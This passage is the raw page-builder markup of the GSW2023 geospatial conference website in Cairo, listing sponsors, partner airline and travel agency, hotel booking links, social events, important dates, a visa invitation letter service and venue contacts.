rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 